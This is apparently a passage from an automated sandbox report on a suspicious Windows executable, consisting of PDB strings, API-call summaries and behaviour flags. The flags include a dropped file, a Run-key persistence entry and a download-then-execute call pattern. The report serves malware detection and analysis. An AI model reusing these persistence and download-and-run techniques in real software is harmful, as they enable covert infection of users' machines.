          Source: Binary string: Windows.StateRepositoryPS.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb~ source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.668176403.00000000030C2000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721203841.00000000006C0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.734239841.000000000327F000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: .pdbAx source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: .pdb% source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb" source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701306786.00000000014A8000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: version.pdbb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdbk source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb= source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb''J source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: psapi.pdb@ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.668152487.00000000030B6000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.720778134.00000000006B4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBx source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdbp source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wUxTheme.pdb8 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: CLBCatQ.pdbc source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDs source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbkw source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: onfiguration.ni.pdb@ source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbbg-6 source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBg[l_ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdbH source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb4 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbE source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb> source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbA source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: 0x9BCFD6C0 [Fri Nov 1 15:56:48 2052 UTC]
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00409908
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 1_2_00AB344C push 00000000h; ret 1_2_00AB3450
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00413ED0 push eax; ret 7_2_00413EFE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_008E344C push 00000000h; ret 15_2_008E3450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014E5080 pushad ; retf 15_2_014E5089
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_066016A9 push es; ret 15_2_066016AC
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_066016AD push es; ret 15_2_066016B0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_00FD344C push 00000000h; ret 16_2_00FD3450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 23_2_0032344C push 00000000h; ret 23_2_00323450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_0053344C push 00000000h; ret 24_2_00533450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_01035088 pushad ; retf 24_2_01035089
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00413ED0 push eax; ret 25_2_00413EFE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0087344C push 00000000h; ret 25_2_00873450
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040D4E5
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to dropped file
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00411700
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00409908
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
